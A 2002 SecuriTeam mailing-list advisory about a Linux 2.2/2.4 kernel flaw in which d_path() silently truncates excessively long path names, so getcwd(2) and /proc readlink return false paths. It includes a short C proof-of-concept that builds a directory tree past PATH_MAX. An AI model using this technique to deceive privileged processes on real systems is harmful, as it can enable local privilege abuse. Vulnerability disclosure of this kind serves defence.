[UNIX] d_path() Truncating Excessive Long Path Name Vulnerability

From: support@securiteam.com
Date: 03/26/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 26 Mar 2002 22:02:12 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  d_path() Truncating Excessive Long Path Name Vulnerability
------------------------------------------------------------------------

SUMMARY

In case of excessively long path names, d_path kernel internal function
returns truncated trailing components of a path name instead of an error
value. As this function is called by getcwd(2) system call and
do_proc_readlink() function, false information may be returned to
user-space processes.

DETAILS

d_path kernel function resolves a string of absolute path name of 'dentry'
is passed as an argument to the function.

The path is a concatenation of subsequent path components starting from
trailing path component. The concatenated path name is stored into a
fixed-length buffer of PAGE_SIZE bytes.

If a 'dentry' points to a path that exceeds PAGE_SIZE - 1 characters
length, leading path components are not written to the buffer and function
returns truncated path without an error value.

Because getcwd(2) system call uses d_path() function, it may return
invalid path to the user-space process. However, if a returned path is
longer than user-space buffer a correct error value is returned.

readlink(2) system call called on proc file system uses do_proc_readlink()
function which is also vulnerable to d_path() bug.

Impact:
Privileged process may be tricked to think it is inside of arbitrary
directory. Other scenarios are possible if readlink() is used on files on
proc file system (like "/proc/self/exe").

Exploit code:
/*
* 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
*
* Bug found by cliph
*/

#include <unistd.h>
#include <stdio.h>
#include <limits.h>
#include <errno.h>
#include <paths.h>

/*
* Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for
* trailing '\0'
*/

#define PATH_COMPONENT "123456789abcdef"

void err(char * msg)
{
  if (errno) {
    perror(msg);
    exit(1);
  }
}

int main()
{
  char buf[PATH_MAX + 1]; /* think of trailing '\0' */
  int len;
  
  errno = 0;
  
  chdir(_PATH_TMP);
  err("chdir");
  
  /* show CWD before exploiting the bug */
  getcwd(buf, sizeof(buf));
  err("getcwd #1");
  fprintf(stderr, "CWD=%.40s\n", buf);
  
  /* creating long directory tree - it must exceed PATH_MAX characters */
  for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) {
    errno = 0;
    mkdir(PATH_COMPONENT, 0700);
    if (errno != EEXIST)
      err("mkdir");
    errno = 0;
    chdir(PATH_COMPONENT);
    err("mkdir");
  }
  
  /* show CWD before exploiting the bug */
  getcwd(buf, sizeof(buf));
  err("getcwd #1");
  fprintf(stderr, "CWD=%.40s... [stripped]\n", buf);
  
  return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:cliph@isec.pl> Wojciech
Purczynski.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.